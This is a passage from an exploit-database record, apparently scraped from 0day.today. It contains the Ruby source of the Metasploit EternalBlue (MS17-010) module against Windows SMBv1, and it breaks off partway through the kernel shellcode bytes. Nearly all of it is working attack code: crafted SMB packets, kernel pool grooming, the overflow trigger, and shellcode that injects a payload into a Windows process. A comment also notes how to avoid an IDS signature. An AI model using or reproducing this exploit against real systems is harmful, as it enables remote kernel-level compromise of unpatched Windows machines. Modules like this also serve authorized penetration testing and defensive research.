["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27786", "href": "https://0day.today/exploit/description/27786", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'ruby_smb'\r\nrequire 'ruby_smb/smb1/packet'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\r\n 'Description' => %q{\r\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\r\n the FuzzBunch toolkit released by Shadow Brokers.\r\n\r\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\r\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\r\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\r\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\r\n completed in srvnet!SrvNetWskReceiveComplete.\r\n\r\n This exploit, like the original may not trigger 100% of the time, and should be\r\n run continuously until triggered. It seems like the pool will get hot streaks\r\n and need a cool down period before the shells rain in again.\r\n },\r\n\r\n 'Author' => [\r\n 'Sean Dillon <[email\u00a0protected]>', # @zerosum0x0\r\n 'Dylan Davis <[email\u00a0protected]>', # @jennamagius\r\n 'Equation Group',\r\n 'Shadow Brokers'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143' ],\r\n [ 'CVE', '2017-0144' ],\r\n [ 'CVE', '2017-0145' ],\r\n [ 'CVE', '2017-0146' ],\r\n [ 'CVE', '2017-0147' ],\r\n [ 'CVE', '2017-0148' ],\r\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000, # this can be more, needs to be recalculated\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 and Server 2008 (x64) All Service Packs',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ ARCH_X64 ],\r\n\r\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\r\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\r\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\r\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(445),\r\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\r\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\r\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\r\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] )\r\n ])\r\n end\r\n\r\n def check\r\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\r\n end\r\n\r\n def exploit\r\n begin\r\n for i in 1..datastore['MaxExploitAttempts']\r\n\r\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\r\n\r\n smb_eternalblue(datastore['ProcessName'], grooms)\r\n\r\n # we don't need this sleep, and need to find a way to remove it\r\n # problem is session_count won't increment until stage is complete :\\\r\n secs = 0\r\n while !session_created? and secs < 5\r\n secs += 1\r\n sleep 1\r\n end\r\n\r\n if session_created?\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n break\r\n else\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n end\r\n end\r\n\r\n rescue ::RubySMB::Error::UnexpectedStatusCode,\r\n ::Errno::ECONNRESET,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_bad(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_bad(error.class.to_s)\r\n print_bad(error.message)\r\n print_bad(error.backtrace.join(\"\\n\"))\r\n ensure\r\n # pass\r\n end\r\n end\r\n\r\n #\r\n # Increase the default delay by five seconds since some kernel-mode\r\n # payloads may not run immediately.\r\n #\r\n def wfs_delay\r\n super + 5\r\n end\r\n\r\n def smb_eternalblue(process_name, grooms)\r\n begin\r\n # Step 0: pre-calculate what we can\r\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\r\n payload_hdr_pkt = make_smb2_payload_headers_packet\r\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\r\n\r\n # Step 1: Connect to IPC$ share\r\n print_status(\"Connecting to target for exploitation.\")\r\n client, tree, sock = smb1_anonymous_connect_ipc()\r\n print_good(\"Connection established for exploitation.\")\r\n\r\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\r\n\r\n # Step 2: Create a large SMB1 buffer\r\n print_status(\"Sending all but last fragment of exploit packet\")\r\n smb1_large_buffer(client, tree, sock)\r\n\r\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\r\n print_status(\"Starting non-paged pool grooming\")\r\n\r\n # initialize_groom_threads(ip, port, payload, grooms)\r\n fhs_sock = smb1_free_hole(true)\r\n\r\n @groom_socks = []\r\n\r\n print_good(\"Sending SMBv2 buffers\")\r\n smb2_grooms(grooms, payload_hdr_pkt)\r\n\r\n fhf_sock = smb1_free_hole(false)\r\n\r\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\r\n fhs_sock.shutdown()\r\n\r\n print_status(\"Sending final SMBv2 buffers.\") # 6x\r\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\r\n\r\n fhf_sock.shutdown()\r\n\r\n print_status(\"Sending last fragment of exploit packet!\")\r\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\r\n sock.put(final_exploit_pkt)\r\n\r\n print_status(\"Receiving response from exploit packet\")\r\n code, raw = smb1_get_response(sock)\r\n\r\n if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)\r\n print_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\")\r\n end\r\n\r\n # Step 4: Send the payload\r\n print_status(\"Sending egg to corrupted connection.\")\r\n\r\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\r\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\r\n\r\n print_status(\"Triggering free of corrupted buffer.\")\r\n # tree disconnect\r\n # logoff and x\r\n # note: these aren't necessary, just close the sockets\r\n\r\n ensure\r\n abort_sockets\r\n end\r\n end\r\n\r\n def smb2_grooms(grooms, payload_hdr_pkt)\r\n grooms.times do |groom_id|\r\n gsock = connect(false)\r\n @groom_socks << gsock\r\n gsock.put(payload_hdr_pkt)\r\n end\r\n end\r\n\r\n def smb1_anonymous_connect_ipc()\r\n sock = connect(false)\r\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\r\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')\r\n client.negotiate\r\n\r\n pkt = make_smb1_anonymous_login_packet\r\n sock.put(pkt)\r\n\r\n code, raw, response = smb1_get_response(sock)\r\n\r\n unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS\r\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\"\r\n end\r\n\r\n client.user_id = response.uid\r\n\r\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\r\n\r\n return client, tree, sock\r\n end\r\n\r\n def smb1_large_buffer(client, tree, sock)\r\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\r\n\r\n # send NT Trans\r\n vprint_status(\"Sending NT Trans Request packet\")\r\n sock.put(nt_trans_pkt)\r\n\r\n vprint_status(\"Receiving NT Trans packet\")\r\n raw = sock.get_once\r\n\r\n # Initial Trans2 request\r\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\r\n\r\n # send all but last packet\r\n for i in 1..14\r\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\r\n end\r\n\r\n trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)\r\n\r\n vprint_status(\"Sending malformed Trans2 packets\")\r\n sock.put(trans2_pkt_nulled)\r\n\r\n sock.get_once\r\n end\r\n\r\n def smb1_free_hole(start)\r\n sock = connect(false)\r\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\r\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')\r\n client.negotiate\r\n\r\n pkt = \"\"\r\n\r\n if start\r\n vprint_status(\"Sending start free hole packet.\")\r\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\r\n else\r\n vprint_status(\"Sending end free hole packet.\")\r\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\r\n end\r\n\r\n #dump_packet(pkt)\r\n sock.put(pkt)\r\n\r\n vprint_status(\"Receiving free hole response.\")\r\n sock.get_once\r\n\r\n return sock\r\n end\r\n\r\n def smb1_get_response(sock)\r\n raw = sock.get_once\r\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\r\n code = response.nt_status\r\n return code, raw, response\r\n end\r\n\r\n def make_smb2_payload_headers_packet\r\n # don't need a library here, the packet is essentially nonsensical\r\n pkt = \"\"\r\n pkt << \"\\x00\" # session message\r\n pkt << \"\\x00\\xff\\xf7\" # size\r\n pkt << \"\\xfeSMB\" # SMB2\r\n pkt << \"\\x00\" * 124\r\n\r\n pkt\r\n end\r\n\r\n def make_smb2_payload_body_packet(kernel_user_payload)\r\n # precalculated lengths\r\n pkt_max_len = 4204\r\n pkt_setup_len = 497\r\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\r\n\r\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\r\n pkt = \"\"\r\n\r\n # padding\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x03\\x00\\x00\\x00\"\r\n pkt << \"\\x00\" * 0x1c\r\n pkt << \"\\x03\\x00\\x00\\x00\"\r\n pkt << \"\\x00\" * 0x74\r\n\r\n # KI_USER_SHARED_DATA addresses\r\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\r\n pkt << \"\\x00\" * 0x10\r\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\r\n pkt << \"\\x00\" * 0xc4\r\n\r\n # payload addreses\r\n pkt << \"\\x90\\xf1\\xdf\\xff\"\r\n pkt << \"\\x00\" * 0x4\r\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\r\n pkt << \"\\x00\" * 0x40\r\n\r\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\"\r\n\r\n pkt << kernel_user_payload\r\n\r\n # fill out the rest, this can be randomly generated\r\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_echo_packet(tree_id, user_id)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # type\r\n pkt << \"\\x00\\x00\\x31\" # len = 49\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x2b\" # Echo\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Success\r\n pkt << \"\\x18\" # flags\r\n pkt << \"\\x07\\xc0\" # flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # Tree ID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexIDs\r\n\r\n pkt << \"\\x01\" # Word count\r\n pkt << \"\\x01\\x00\" # Echo count\r\n pkt << \"\\x0c\\x00\" # Byte count\r\n\r\n # echo data\r\n # this is an existing IDS signature, and can be nulled out\r\n #pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\"\r\n pkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\"\r\n\r\n pkt\r\n end\r\n\r\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\r\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\r\n timeout = (timeout * 0x10) + 3\r\n\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x10\\x35\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x33\" # Trans2 request\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexIDs\r\n\r\n pkt << \"\\x09\" # Word Count\r\n pkt << \"\\x00\\x00\" # Total Param Count\r\n pkt << \"\\x00\\x10\" # Total Data Count\r\n pkt << \"\\x00\\x00\" # Max Param Count\r\n pkt << \"\\x00\\x00\" # Max Data Count\r\n pkt << \"\\x00\" # Max Setup Count\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x00\\x10\" # Flags\r\n pkt << \"\\x35\\x00\\xd0\" # Timeouts\r\n pkt << timeout.chr\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x10\" # Parameter Count\r\n\r\n #pkt << \"\\x74\\x70\" # Parameter Offset\r\n #pkt << \"\\x47\\x46\" # Data Count\r\n #pkt << \"\\x45\\x6f\" # Data Offset\r\n #pkt << \"\\x4c\" # Setup Count\r\n #pkt << \"\\x4f\" # Reserved\r\n\r\n if type == :eb_trans2_exploit\r\n vprint_status(\"Making :eb_trans2_exploit packet\")\r\n\r\n pkt << \"\\x41\" * 2957\r\n\r\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\r\n\r\n pkt << \"\\x00\" * 0x10\r\n pkt << \"\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x6\r\n pkt << \"\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x16\r\n\r\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x20\\xf0\\xdf\\xff\"\r\n\r\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\r\n\r\n pkt << \"\\x60\\x00\\x04\\x10\"\r\n pkt << \"\\x00\" * 4\r\n\r\n pkt << \"\\x80\\xef\\xdf\\xff\"\r\n\r\n pkt << \"\\x00\" * 4\r\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x10\r\n\r\n pkt << \"\\x60\\x00\\x04\\x10\"\r\n pkt << \"\\x00\" * 0xc\r\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x80\\x10\"\r\n pkt << \"\\x00\" * 0xe\r\n pkt << \"\\x39\"\r\n pkt << \"\\xbb\"\r\n\r\n pkt << \"\\x41\" * 965\r\n\r\n return pkt\r\n end\r\n\r\n if type == :eb_trans2_zero\r\n vprint_status(\"Making :eb_trans2_zero packet\")\r\n pkt << \"\\x00\" * 2055\r\n pkt << \"\\x83\\xf3\"\r\n pkt << \"\\x41\" * 2039\r\n #pkt << \"\\x00\" * 4096\r\n else\r\n vprint_status(\"Making :eb_trans2_buffer packet\")\r\n pkt << \"\\x41\" * 4096\r\n end\r\n\r\n pkt\r\n\r\n end\r\n\r\n def make_smb1_nt_trans_packet(tree_id, user_id)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x04\\x38\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\xa0\" # NT Trans\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n\r\n pkt << \"\\x14\" # Word Count\r\n pkt << \"\\x01\" # Max Setup Count\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count\r\n pkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Param Count\r\n pkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset\r\n pkt << \"\\xd0\\x03\\x00\\x00\" # Data Count\r\n pkt << \"\\x68\\x00\\x00\\x00\" # Data Offset\r\n pkt << \"\\x01\" # Setup Count\r\n pkt << \"\\x00\\x00\" # Function <unknown>\r\n pkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup\r\n pkt << \"\\xec\\x03\" # Byte Count\r\n pkt << \"\\x00\" * 0x1f # NT Parameters\r\n\r\n # undocumented\r\n pkt << \"\\x01\"\r\n pkt << \"\\x00\" * 0x3cd\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x00\\x51\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x73\" # Session Setup AndX\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << flags2 # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << \"\\x00\\x00\" # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n #pkt << \"\\x00\\x00\" # Reserved\r\n\r\n pkt << \"\\x0c\" # Word Count\r\n pkt << \"\\xff\" # No further commands\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # AndXOffset\r\n pkt << \"\\x04\\x11\" # Max Buffer\r\n pkt << \"\\x0a\\x00\" # Max Mpx Count\r\n pkt << vcnum # VC Number\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Session key\r\n pkt << \"\\x00\\x00\" # Security blob length\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\\x00\\x80\" # Capabilities\r\n pkt << \"\\x16\\x00\" # Byte count\r\n #pkt << \"\\xf0\" # Security Blob: <MISSING>\r\n #pkt << \"\\xff\\x00\\x00\\x00\" # Native OS\r\n #pkt << \"\\x00\\x00\" # Native LAN manager\r\n #pkt << \"\\x00\\x00\" # Primary domain\r\n pkt << native_os\r\n pkt << \"\\x00\" * 17 # Extra byte params\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_anonymous_login_packet\r\n # Neither Rex nor RubySMB appear to support Anon login?\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x00\\x88\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x73\" # Session Setup AndX\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n\r\n pkt << \"\\x0d\" # Word Count\r\n pkt << \"\\xff\" # No further commands\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x88\\x00\" # AndXOffset\r\n pkt << \"\\x04\\x11\" # Max Buffer\r\n pkt << \"\\x0a\\x00\" # Max Mpx Count\r\n pkt << \"\\x00\\x00\" # VC Number\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Session key\r\n pkt << \"\\x01\\x00\" # ANSI pw length\r\n pkt << \"\\x00\\x00\" # Unicode pw length\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Reserved\r\n pkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities\r\n pkt << \"\\x4b\\x00\" # Byte count\r\n pkt << \"\\x00\" # ANSI pw\r\n pkt << \"\\x00\\x00\" # Account name\r\n pkt << \"\\x00\\x00\" # Domain name\r\n\r\n # Windows 2000 2195\r\n pkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n pkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\"\r\n pkt << \"\\x00\\x00\"\r\n\r\n # Windows 2000 5.0\r\n pkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n pkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\"\r\n\r\n pkt\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\r\n # et_alertable = ETHREAD.Alertable offset\r\n # teb_acp = TEB.ActivationContextPointer offset\r\n # et_tle = ETHREAD.ThreadListEntry offset\r\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\r\n sc = make_kernel_shellcode\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n sc\r\n end\r\n\r\n def make_kernel_shellcode\r\n # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Name: kernel\r\n # Length: 1019 bytes\r\n\r\n #\"\\xcc\"+\r\n \"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" +\r\n \"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" +\r\n \"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" +\r\n \"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" +\r\n \"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" +\r\n \"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" +\r\n \"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" +\r\n \"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" +\r\n \"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" +\r\n \"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" +\r\n \"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" +\r\n \"\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x48\\x83\" +\r\n \"\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\\x41\\x5B\\x41\\x5A\\x41\\x59\" +\r\n \"\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\\x48\\x8B\\x24\\x25\\x10\\x00\" +\r\n \"\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\\xD0\\xFF\\x56\\x41\\x57\\x41\" +\r\n \"\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\\x66\\x83\\xE4\\xF0\\x48\\x83\" +\r\n \"\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\\x4C\\x8B\\x3C\\x25\\x38\\x00\" +\r\n \"\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\\x49\\xC1\\xE7\\x0C\\x49\\x81\" +\r\n \"\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\\xFE\\x4D\\x5A\\x75\\xEF\\x41\" +\r\n \"\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\\x48\\x89\\xC6\\x48\\x81\\xC6\" +\r\n \"\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\\xE8\\x03\\x02\\x00\\x00\\x48\" +\r\n \"\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\\x00\\x05\\x00\\x00\\x48\\x39\" +\r\n \"\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\\x36\\x48\\x39\\xCE\\x75\\xE2\" +\r\n \"\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\\x81\\xF9\\x00\\x00\\x01\\x00\" +\r\n \"\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\\xCB\\x41\\xBB\\x66\\x55\\xA2\" +\r\n \"\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\\x49\\x8B\\x0E\\x41\\xBB\\xA3\" +\r\n \"\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\\xC6\\xE8\\x50\\x01\\x00\\x00\" +\r\n \"\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\" +\r\n \"\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\\x11\\xDC\\xE8\\x81\\x01\\x00\" +\r\n 